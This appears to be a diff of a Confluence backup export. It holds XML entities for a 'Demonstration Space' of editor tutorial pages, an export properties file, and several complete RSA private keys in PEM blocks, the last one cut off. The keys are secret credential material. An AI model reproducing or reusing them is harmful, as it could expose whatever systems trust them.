<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98318</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163851</id>
|
||||
<property name="body"><![CDATA[]]></property>
|
||||
<property name="content" class="SpaceDescription" package="com.atlassian.confluence.spaces"><id name="id">98357</id>
|
||||
</property>
|
||||
<property name="bodyType">0</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163841</id>
|
||||
<property name="body"><![CDATA[<p style="margin-left: 60.0px;"> </p><p>Pages live in spaces. This page is in the 'Demonstration Space'. <br /> </p><p>Let's play with some content. Don't worry, you won't break anything:</p><ol><li>Click <strong>Edit</strong> at the top of this page. Now you're in the editor.<br /><br /></li><li>Type some words anywhere on the page.<br /><br /></li><li>Have some fun:<span style="line-height: 0.0px;"> </span></li></ol><ul><li style="list-style-type: none;"><ul><li>Change the color of the text: Select the text, then choose a color from the color option in the editor tool bar.<br /><br /></li><li>Add a link: Select some text, then choose the <strong>Link</strong> button on the toolbar.<br />Click <strong>Web Link</strong> and enter an <strong>Address</strong>, such as <code>http://www.atlassian.com</code>. <br />Click <strong>Insert</strong> to insert the link.<br /><br /></li><li>Find a file or picture on your computer, and drag it anywhere on this page.<br /><br /></li><li>Try some of the other options on the editor toolbar.</li></ul></li></ul><p>When<em> y</em>ou're ready, click <strong>Update</strong> to publish your changes then<strong> </strong>and go to the next step or back to the space home.</p><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><br /></span></h1><h1 style="text-align: center;"><span style="color: rgb(51,51,51);"><ac:link><ri:page ri:content-title="A quick look at the editor (step 2 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg" /></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg" /></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Prettify the page with an image (step 4 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg" /></ac:image></ac:link-body></ac:link></span></h1><p> </p>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98317</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163842</id>
|
||||
<property name="body"><![CDATA[<p style="text-align: center;"> </p><h2><ac:image><ri:attachment ri:filename="welcome.png" /></ac:image><br /> <span style="color: rgb(128,128,128);">With Confluence it is easy to create, edit and share content with your team. <br /> Choose a topic below to start learning how.</span></h2><h2><span style="color: rgb(0,0,128);"><br /></span></h2><ol><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="What is Confluence? (step 1 of 9)" /><ac:link-body>What is Confluence?<br /><br /></ac:link-body></ac:link></span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="A quick look at the editor (step 2 of 9)" /><ac:plain-text-link-body><![CDATA[A quick look at the editor]] ></ac:plain-text-link-body></ac:link><br /> </span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /><ac:plain-text-link-body><![CDATA[Let's edit this page]] ></ac:plain-text-link-body></ac:link><br /><br /></span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="Prettify the page with an image (step 4 of 9)" /><ac:link-body>Prettify the page with an image<br /><br /></ac:link-body></ac:link></span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="Get serious with a table (step 5 of 9)" /><ac:link-body>Get serious with a table<br /></ac:link-body></ac:link></span><span style="color: rgb(0,0,128);"> </span></li><li><span style="color: rgb(0,0,128);"><ac:link><ri:page ri:content-title="Lay out your page (step 6 of 9)" /><ac:plain-text-link-body><![CDATA[Lay out your page]] ></ac:plain-text-link-body></ac:link> <br /><br /></span></li><li><ac:link><ri:page ri:content-title="Learn the wonders of autoconvert (step 7 of 9)" /><ac:plain-text-link-body><![CDATA[Learn the wonders of autoconvert]] ></ac:plain-text-link-body></ac:link> <br /><br /></li><li><ac:link><ri:page ri:content-title="Tell people what you think in a comment (step 8 of 9)" /><ac:plain-text-link-body><![CDATA[Tell people what you think in a comment]] ></ac:plain-text-link-body></ac:link> <br /><br /></li><li><ac:link><ri:page ri:content-title="Share your page with a team member (step 9 of 9)" /><ac:plain-text-link-body><![CDATA[Share your page with a team member]] ></ac:plain-text-link-body></ac:link></li></ol><p><span style="color: rgb(128,128,128);"><br /></span></p><p><span style="color: rgb(128,128,128);"><br /></span></p><p><span style="color: rgb(128,128,128);"><br /></span></p><p><span style="color: rgb(128,128,128);"><br /></span></p><p><span style="color: rgb(128,128,128);"><br /></span></p><p style="text-align: right;"> </p>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="BodyContent" package="com.atlassian.confluence.core">
|
||||
<id name="id">163843</id>
|
||||
<property name="body"><![CDATA[<p style="margin-left: 60.0px;"> </p><p><strong>Confluence</strong> is where you can create, organize and discuss work with your team. <br />Use Confluence for meeting notes, project plans, requirements, sprint planning, how-to guides, or anything you like.</p><p>Click the <strong>Create</strong> button on the header to see some of the types of pages you can create.</p><p>A Confluence page can contain text, images, diagrams, activity streams, videos, and more. <br />Confluence puts your content online in a central place where your team can search, edit and discuss it at any time. <span><span style="color: rgb(0,0,0);"> </span></span></p><p><span><span style="color: rgb(0,0,0);">So let's try it!<span style="color: rgb(0,0,255);"> <ac:link><ri:page ri:content-title="A quick look at the editor (step 2 of 9)" /><ac:plain-text-link-body><![CDATA[Click here to learn how to edit a page]] ></ac:plain-text-link-body></ac:link></span> </span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"> </span></span></p><h1 style="text-align: center;"><ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="prev.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="Welcome to Confluence" /><ac:link-body><ac:image><ri:attachment ri:filename="home.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link> <ac:link><ri:page ri:content-title="A quick look at the editor (step 2 of 9)" /><ac:link-body><ac:image><ri:attachment ri:filename="next.jpg"><ri:page ri:content-title="Let's edit this page (step 3 of 9)" /></ri:attachment></ac:image></ac:link-body></ac:link></h1><p><span style="color: rgb(51,51,51);"><br /></span></p><p><span style="color: rgb(51,51,51);"><br /></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p><p><span style="color: rgb(153,153,153);"><span style="color: rgb(0,0,0);"><br /></span></span></p>]]></property>
|
||||
<property name="content" class="Page" package="com.atlassian.confluence.pages"><id name="id">98320</id>
|
||||
</property>
|
||||
<property name="bodyType">2</property>
|
||||
</object>
|
||||
<object class="Space" package="com.atlassian.confluence.spaces">
|
||||
<id name="id">131073</id>
|
||||
<property name="name"><![CDATA[Demonstration Space]]></property>
|
||||
<property name="key"><![CDATA[ds]]></property>
|
||||
<property name="lowerKey"><![CDATA[ds]]></property>
|
||||
<property name="description" class="SpaceDescription" package="com.atlassian.confluence.spaces"><id name="id">98357</id>
|
||||
</property>
|
||||
<property name="homePage" class="Page" package="com.atlassian.confluence.pages"><id name="id">98319</id>
|
||||
</property>
|
||||
<collection name="permissions" class="java.util.Collection"><element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458761</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458762</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458763</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458764</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458765</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458766</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458767</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458768</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458769</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458770</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458771</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458772</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458773</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458774</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458775</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458776</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458777</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458778</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458779</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458780</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458781</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458782</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458783</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458784</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458785</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458786</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458787</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458788</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458789</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458790</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458791</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458792</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458793</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458794</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458795</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458796</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458797</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458798</id>
|
||||
</element>
|
||||
<element class="SpacePermission" package="com.atlassian.confluence.security"><id name="id">458799</id>
|
||||
</element>
|
||||
</collection>
|
||||
<property name="creationDate">2020-04-14 11:55:11.912</property>
|
||||
<property name="lastModificationDate">2023-11-09 06:03:45.265</property>
|
||||
<property name="spaceType">global</property>
|
||||
<property name="spaceStatus" enum-class="SpaceStatus" package="com.atlassian.confluence.spaces">CURRENT</property>
|
||||
</object>
|
||||
</hibernate-generic>
|
||||
@@ -0,0 +1,14 @@
|
||||
#Thu Nov 09 06:05:19 UTC 2023
|
||||
ao.data.version.min.com.atlassian.mywork.mywork-confluence-host-plugin=1.1.30
|
||||
ao.data.version.com.atlassian.mywork.mywork-confluence-host-plugin=8.3.8
|
||||
createdByVersionNumber=7.19.12
|
||||
supportEntitlementNumber=SEN-L1699509489567
|
||||
source=server
|
||||
buildNumber=8506
|
||||
ao.data.list=com.atlassian.mywork.mywork-confluence-host-plugin, com.atlassian.confluence.plugins.confluence-space-ia
|
||||
ao.data.version.min.com.atlassian.confluence.plugins.confluence-space-ia=5.0
|
||||
defaultUsersGroup=confluence-users
|
||||
ao.data.version.com.atlassian.confluence.plugins.confluence-space-ia=17.19.9
|
||||
exportType=all
|
||||
createdByBuildNumber=8804
|
||||
backupAttachments=true
|
||||
@@ -0,0 +1,27 @@
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
MIIEpQIBAAKCAQEAzbGeKAIbNI5h3LnQXhN3P1/8aUH9FfUQVaKKI/tOhzByQ/v4
|
||||
DKD5hfXl+oxkoGeqSafpccPl4A1MOEe7ccd1mt96iBDnufUKfbjZyfH92ONM9RVV
|
||||
GrhhXruRe/qbkLNlwFNdaYmi/UHbYu+fgiDrE4np4MvGACzLvv6Hu/cDe2kSjFNd
|
||||
zs7wvzZ95fliH/+nsBUqC3JntH+KZy0JZW6QJ8WkY5g7KXlfTPkFdEfMuNLKbD3w
|
||||
j/d+FFY0CI7XR8JX96w0cfYs6k94enzag0eKeAJAbUFXTkK73Cg3fomws2SlCZPi
|
||||
KiRXdMJFY2pKwg1KJU9SqsfHQvz8UCRvpE3KyQIDAQABAoIBAA3KfNod2gkaCsGr
|
||||
y6ajE3myS9Aa1ockWSYEsdJbxRYXT3HzcNwX5uLua67yvsRqbuZlVaeFBOKSwat8
|
||||
U7r7Lo1lsmdxCrhTD5MCU8fQa76g7sX32i7icdTSKpzvXoLDJG1SqY6r5bupMLZf
|
||||
bohhAKHcu0uRHgNg/YAevKcDlr4tXGICajsToSg4UlxVcbxGcuvLKld8FKZrKuE0
|
||||
fPDkEp6j4056bYMilO/xTpDb+WyegzTxA842CweLBZo/XXD3ZS5wiad6evnjp57E
|
||||
gd6S6huavL9uzNpmqr1BfSl6r+bWTXcFBNYyaEo1Y+Sa8ZzgOql7VblmW23Pqetc
|
||||
f1Jn0AECgYEA/Fxo8cBl4myOeiKSddCwSLrlP0zizXQ5L9ppooXqH5nuA96R00jU
|
||||
ryygUJ0tPp2iODdBoO5tGTIbqHBOEu4i7JejrPML9Y33bZq+M4ZeNnMimfK60N4g
|
||||
j7ma/Qqvz6MSi3Dh9rYMoavkMVrr2TJEKQrjMpBmuXP1W+5b0fTq4QECgYEA0Kjv
|
||||
ptAyCy9/Mq8Fn2vY6hJQEb3WUukClBccxCCYKRWPvFjg4tWRdSKpqPH9LMZ7Ra74
|
||||
xZjPa27eTymADo49/3whsVOPiQV/dKbf0vhwGuSMMxyEpOWdvILJNo0HW+f98//K
|
||||
DFvIkByqc+517LyKHhco8Cti/I22qLY8+27iIckCgYEAt0S9CeP5mcfQaK42wsy9
|
||||
WPQxjBjgFOi0pyXs1RR/hFebXMAEEvavTlAQVLrwoqqDpmOqi57bKBMVtutoJ6M9
|
||||
RaiSOwV+x+NDrxtTycNpJA3VMQvv08OczgOypNVf/GCnFRDzaOGoprhYTeeDpAY3
|
||||
Lb80ZAIuN7wYkZy2nfFJqgECgYEAlSqgIG2nyO1MjmwmpeBQco1i5jwDMsRWzo1z
|
||||
SBZRENXUKn6TTjYFRWrhROCx8Ed4Ksm6GHB0n8XjcU4muMEhOzp/T6h/7SGcC0Wc
|
||||
rtJiOid2vrc9cDCiQfhxZekOALrphnwu8gTPbY7AoB4x+WqTho1h+8fYfNnGYffd
|
||||
wpVzXVkCgYEA0vxFIs633h7ct2qBH50ieDCPc0RsTBhZHGXYmYfq596K3ZOHF2IV
|
||||
ICFq9r4zBorUwC3f/u/KvfjkilZTMN73GDWigdQGnP3eG0xKw9plv686M9HhCEI5
|
||||
Q2wnkxwYstzUwQ2zxwgU0l6z2OUXfG2oP3DRmFdQ4ma+c3MB1oxiX7E=
|
||||
-----END RSA PRIVATE KEY-----
|
||||
@@ -0,0 +1,27 @@
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
MIIEogIBAAKCAQEAsgKBrNNWF+QwDEP1w4HNuVQNBwLU0g/7Ua3SNNxhQvgx9oe7
|
||||
Oh6c8YFvtmpSIjpOj3aD+w0bKZ8cEEPIGPV4OJ8tbuV09GtRPO+TbffhDsnwZB5Y
|
||||
fLhUsSM1/PjVTCfzrz2crs6CWRrDXLd3Qm9EdYAY01hE1Zo3TeqwsmXfy+7llF5z
|
||||
iHKs54yDm/x+CEVL/QfaDTxyTSGeXpQSd6Y9nVhSGZPu2LyqksEffGJCxhzqgz0R
|
||||
ldsfYTo64XofPUPRVvuNMJtBbdWIvzEqGGoaqOmm6XZhhh0ND4N9hyFnKA02q6Yb
|
||||
CR8q0gtEXBhDIM0e/rSoc+UoAhnbBJ4EiTnIywIDAQABAoIBAHiy1GRwA789XQrk
|
||||
Bb8jw283O4IWfGFWrszKNG7dQyGakp4bmGqnGTlzz2B7pOdKa7xA2uqeD13gYbHx
|
||||
k7rArlyOKcs40F1uau4LcAavfa1+ZX4tSUh/4AUf39qAingR2txmxVeN9LogOHkk
|
||||
eTvVoDCfw7WB82J2J6uwR1EfXGi0mGTyk+DzarzCm2S3jHVVlsWMC1rf440/NJxa
|
||||
2isVsh19CC9RXF8Npgd/b/TszLc9UzmFsYstQRrFXHTGO8LAmXYd+Jxb5ejbAAAJ
|
||||
zKN7YDdTPJvPmS9VUH0W3OeEvMDiY+56JJwk4u52vgfKThyP6AD/wIjRDXyp+eSi
|
||||
3wLoHQkCgYEA46eoL2tgjFfybLTQFt59/MBSWCKHEs5VKrBrGb8NhcmX0V7xLNip
|
||||
ZtV7gN55ZQdI78pXyXpZsbU8EDx+5hrG7HDTLkl2N2n0vJNKtmj/oh/AgHt4EXUY
|
||||
aLDSXSAsHPYAmdgg3kX61fgB7J3ByEPxjVk1B0tUShJ1d7/K3upvEj0CgYEAyCxy
|
||||
GPppQIcLfkC71qZqsJuyZapf1+GkEve/eUh7su3k9coy4bTNaBuDTLSRpDjSbsoO
|
||||
2jfAtImOjt95ZZGyCa2+bCDQlPKwG1C+I3ZQKYmSqxfHhS7W+0/iWqM4TL/yX1oM
|
||||
0jejJarZre+dfAEQtG6F5+lOnq6tx9uG+MRFn6cCgYB9LX8pM93Ozb0bUQDq0kRs
|
||||
akPc+n9TM+lYo9EAQzFoU0ULdy0d/7SGOvTCE5KknrDYSWaj/oa7VHBGbT1JwYeI
|
||||
EzHLzdEW/0f3OPZn/qwxtUvgWgPXdY+KYVAKrNoUwp/p+BF6pvgaF1jXhpc7S0DS
|
||||
/C5QaHdck3HL+sXOdRHF8QKBgE/QQPIqrlrXPcLqZrsQgcvHWNtmkm6OfpA9jm/6
|
||||
cbAHYNqL87vBDoGrLrAf805KhcU89a0Wu9SAYIIhItNXw2hOiXWto90v4v4RNK8J
|
||||
Fq9pNjzX72rwITH1SSigmesoQai5TBFps7hqJf9PYji2aAW5Z9TvVrS4q3vb0TZR
|
||||
c/1TAoGAa+/A8GjiQFiveMRKfFW0vrk3/kJfe9h+w9Wly/Zev0TWZDBJquRFbIvM
|
||||
CyQ3PZZT/CM8vjRKb37oKsSM4Qz+CMpcEwyr3uu/MUak3KqD/j35XWW/kY/50qiv
|
||||
yDHbWgAyzi5wBd8uu2r/ILA3LCH4SHYA5X1XKEUwEAuaSXQUhVg=
|
||||
-----END RSA PRIVATE KEY-----
|
||||
@@ -0,0 +1,27 @@
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
MIIEpAIBAAKCAQEAyYCxnpm+fPQmfJ9otzl6yBI5XbHQ0nLdod646tj48ZTnLAr/
|
||||
MSfHxpHmfJhavWbkOIPjMpE9vft7z37KVldTVZLXWpgUqSJAIF01dm8nqR3ErQqk
|
||||
9kXjf/i4qRKX6vSZxexV9nUedCm75OM4dCrfMRq08zQkQgKJ5LZQzY6nIZn2VKqJ
|
||||
aaFYUTy3PpX6J6ObOa4Ft8pz8PIuwCnMR/yQFOPlY8sxvxv7de3g/VJh25Q7kLWw
|
||||
tSUIc6E4dzEIWi9o+q83tixXtvtlNcSA2LXWjQKBNo7lWvjqQbx4f/mwB4/ipqVf
|
||||
PQG/bolQ/2Wr+HF9E5XSpZrxFVOOIBSJm7+uJwIDAQABAoIBADfjQuBrYgMEMJyG
|
||||
FiQjhCNzsoeDJxkHlOMtg/pXHYzbsNZtYmQ+1VEE7HmIRDqeDBSEuAIxeH91/dwK
|
||||
HZKe+9UTOjm9TpWukzymvYpQwB5OzFr2RdSsg7HdyVHTf2FCYFgd+aW2zDCJ1rxg
|
||||
LStDLM5Qyvldb+UDET3nNzgcJczSigaHNVmUYv02yqELolHumD3X2uJnLsOrIIvS
|
||||
FlaGHhL2r4b67lTE27DBfRVFcTZmsWtS2mnJuQuBv2Bv1wXA3DmvJBgsUOVR03pT
|
||||
rxSn/vhJ+Lh+xqse3B60zJq8xncPUGLqT739J4rrxlkjGlQ3n4hYFdCrnaucKXI5
|
||||
AA1mvnECgYEA64Ftg8kUPEqNqjSnk8q3CFz+vhOpa5PPtfvroSrBg3KgollRC94q
|
||||
qnvpSjK9BBzlRriG9qNjne92JMXnOPlgyxM1u/GpMW8Mh5s32SERZ0sxFPzacon2
|
||||
e8ZFOMx/T5j3VzeElrrlpnIy9U4z+088EHaVvCJF1hNGCKYHusLcKi8CgYEA2wnA
|
||||
0btJLPXbWLLrEimXEaM8XEUpVvebR2r8PX+50puTi9vIejApNUsfpWnkKGl2zp74
|
||||
d0Z4EgLIsIpbmv4Nue/vB4e4nEP6vbdKxAVXWHOXPiMJgw5zCq1PLR35T33aBxmh
|
||||
RiGCyeeLl0SA6ykIh2MNGVyC+K7KyriW7/ds1YkCgYEA2p+ZMdjuDxZKsrIUyw9J
|
||||
oNrrpTqNcY+TKGbIFCKj6En2MyBlK3Y/92n2ZOn7LCFC+sb8i2Oca5ZL/9E0WGCw
|
||||
6XRY0rOBlKF5aT2/t7KJ/HECDHC6vc+zYK3rvtGgch0XqACi9mZkIIMtKSpC+U5R
|
||||
/RqI4FCUsinMPuUakdapGgMCgYAp1ZoLNK8MNETZkwqMpH7i8n9jzB3SK2Zv5IIa
|
||||
qNtv2yD6FFcc5zfnotp/eFMIWORFIF2qQj5KileUSEiouJ8chTPtB0H+LomkVG6m
|
||||
M7L0BNe9GWoGqurT/jfiERh90zaiJoYD5ACb2Wpy0LWitGqZmRR2ZJHrN08qGslR
|
||||
ObuCqQKBgQDdGGn4N6ke4fSdWxEHRy2VGSVzXAezsK5WpoAKzseJ75KZyc+1E3Ae
|
||||
FuA+dR5JnCUnUBSBHTS6V72qcU4u2D9/4MBQJOCys72/cHuit7vK/pCq/xQ6uQgx
|
||||
FTlL8KWeDQpBJEZddEgTCW21lAiq7Pa8bHwJMCZpRSklTap0bsPITg==
|
||||
-----END RSA PRIVATE KEY-----
|
||||
@@ -0,0 +1,27 @@
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
MIIEowIBAAKCAQEAt4VSizA9wlrjZiBVBhfsBjFopdcuR4t11TYovpBU+HzwzB0O
|
||||
GkoPxsju1ga6rWUDs7ubJD504oBQ0+xSvHN+NTOSj0WGDM9uo2WqP+5r//LIDq3y
|
||||
AXNtF2zlQfZWkS/JpFVcO0Tr5HD0riV18ERAJNRHXxGy2Xe4Mm4lXRi+CpWs5j9/
|
||||
nYWtVEuCEd+cyYWTQbvYLpmEQNRoxHyC3ggJO2MtcxarGQUpyyJGEA5c1f7YogrN
|
||||
5rW8L62FxO8jPVDZjheSRNQlWUbuqTDZi935DLB4nZZX/7dQr1QhwpcWkGlzbr+4
|
||||
6aJdpaxTafgHaIY3F5GDIcrKWyjkQzX7Zv7mrwIDAQABAoIBACqq558Ozz0Rro7+
|
||||
82WgSDLEaAUuu0bNCM9ScTSlD+xZ+A4sryuzjml0K/s8w0gvFSZDdvV9Q+WpWaF7
|
||||
71x7KZuq6uc+jcUKsTlyGJwWjauLQbIQBRULRhDNM5wbbtMAnkwDwJbTFlkdXfXj
|
||||
JcF/zL4DULisv71J1Vx8OVmkuAJzly2K3I66HI4XIlEPoGBm48gnVF5mC0uz/Mtl
|
||||
nISm3hD69u43VUni9cU8yQzqu5RpLOrjvVPvfWW56XPMhxMbS59KXmk7XSLPEqvA
|
||||
9U9jKdMTWa0QlTBK4IjVUaxwND7a+Y6GvPuYoDGpXXlJQ7l3nCxnuhwlbJRXzPVS
|
||||
AJLaSUECgYEA5oD34F0s3roizEB1HuE2aHKbsLxbrkMj1Kx5cR8TS4qAVSNVlq3r
|
||||
yfwri0PpT0GhYSq3dSkPT+dLsAr/Y9EdtKG5rRVxzB8EIhgNoSqbm/NR8W7sCM+j
|
||||
M9b25eyupd/B2Olnnmlo4lCC9tXMj3Pe+hcL27i3o91egJikviBCY48CgYEAy9H3
|
||||
U9Ii9FWU64Lr9F9OxxfbLSV8l/LH8Mvg/3Y3lLciuYMLO1fS7rumXVqn/km8/ikJ
|
||||
pyQF3XO5XbyonRIBMuRemx2C78wO7Pq4/DEzJ68dj9yNrQICME5LWUZ+st53x8qt
|
||||
gyZlIoRDRE6RGVGovVihGTUIUXS6dOtJSBT5OuECgYAoZeYLnojkqD69CXb9aH8+
|
||||
oweCXCC9U+sNtQS7vLSHAsknIsA3Xlf62IVRLR/Q0jHUc8YfdIjIekMboXHNLrNE
|
||||
GywNl7qQCceRqiGJY4xOMsDjzYr0qF90EHLJLUgWrjatK4sLinHlaDLry+DEK4yi
|
||||
zDM52Q/mWj/bzeThpYm9JQKBgQCzfM6SCR5xDqCbGWsSg4/LMg34Xueuo8VBHzmf
|
||||
ngpqMzAoL+eHNdryE1v5H+mKvILrS1ZN0yI7Fzro+kd+MqnNmGBbtwxkgc2vEUgw
|
||||
Bl+nFcYxtycocPlecsRV9QeEGvdegPR15yzuzYyzLYEHy+qN++u6WAJgQSwl5EFf
|
||||
ceDc4QKBgEBlKDKtd2Zl9fovMma09/US/bxZnvsLLPfrRdhBT54a1iuR6LqmnNZo
|
||||
Fz/31eQLLpPz5tQ1w/7v+jbeDKhRakoS4bgIAHjckL0n/dOgvPbKpAXFFMhSpuQ+
|
||||
HMnqEZmits9CjfQEroNufl0XL2EqTqkX3UxSWDyt3KXcVtAEmhlD
|
||||
-----END RSA PRIVATE KEY-----
|
||||
@@ -0,0 +1,27 @@
|
||||
-----BEGIN RSA PRIVATE KEY-----
|
||||
MIIEpAIBAAKCAQEAtpYKEuuvwRmvleIjldsJLLW9k9GhJVE2te2vx1++P8L/Tkvt
|
||||
JWLP8zS/zYz/vQfSFoNxW0+LlbIkfzTBauZzo2gpG6wr3PQKHOioaQUCrdW23epg
|
||||
q8W57xcqmz4b0WkApqpewizOafhKcqnV2YoSewnQiM6I0M4uCa77H8XeNC+CskFH
|
||||
UABAU1CN0M4b8z2VZXg5GIrmNnWApeXpjT1Owhe9G0ULY7ieVaV18xOlF91+UlRO
|
||||
XiPOvn2aiMYlzhCY7GLVGUEMEQCig5EoBDIc8YTSd5gFKuZ/xF3pdIYEoWjgSg5e
|
||||
nTSmgheZOpRtPo/L8F/PwZVFYKzF36a4ksTs7wIDAQABAoIBAQCJdKcc22YzH106
|
||||
n0Ze+MkNabzQ3c5NQ7jGeawNkpytb+W4Uhy0OpGG7L1Ax9d3vb2ByW67aUUSa0xi
|
||||
n5rFGb0Q1ces148mBmrenKC8f1Mm/29t3ZbteiuiPXSL7tQOcNhWoIg58nVq/cs+
|
||||
S3F9Fh8XlanydFo3qCCslZjksJe5/Iwq4lTMNNBSg21U+F4Qjylyk6pyilFPVdRs
|
||||
HgTRDkfpOQfhLg75kUYA3IF1widEKxiDHadFnnYL9aMY96XW0Kr9l7yS0FjgpdtH
|
||||
29oV16GjA0rhUJXzX3KuJfPqGmjOhaSf5WybbwdhjaqaOKqpX9RPyqYjF95Si0o7
|
||||
ejEgTE7RAoGBAOiDZhIHTC2OnfZNncWE/hEbA+mbw6DXxDX7b1gjcY0HU03G9GfK
|
||||
BAimUY5LMssMCG8mLcH2TwC4SYmLDHyWL9qwYBRv4790qfYBCIjh7gyUhgwRrQNX
|
||||
Q057iD4NWTL9XEaOQIKM6QG7xMMy4K+AnwWNrEcxOU/62T80JO4l9hDjAoGBAMkH
|
||||
kJtP0F6mv/Afe/5s7yd3ZJ/72yT73NjLg0vWbmLkop6eOR+CKw4nxorWxpocAj0p
|
||||
+ximRgDPHIZjMQnUVdUQNuCcWK7T3TzpsIM7CcbbWHemukSwQPBlkP3Z5UBs0YFz
|
||||
8L7uCqVSWcnBE8zXQkKIRdro7iXjoirI1NEwRO2FAoGAGhnuEmYJUi/pYaXy6SJ1
|
||||
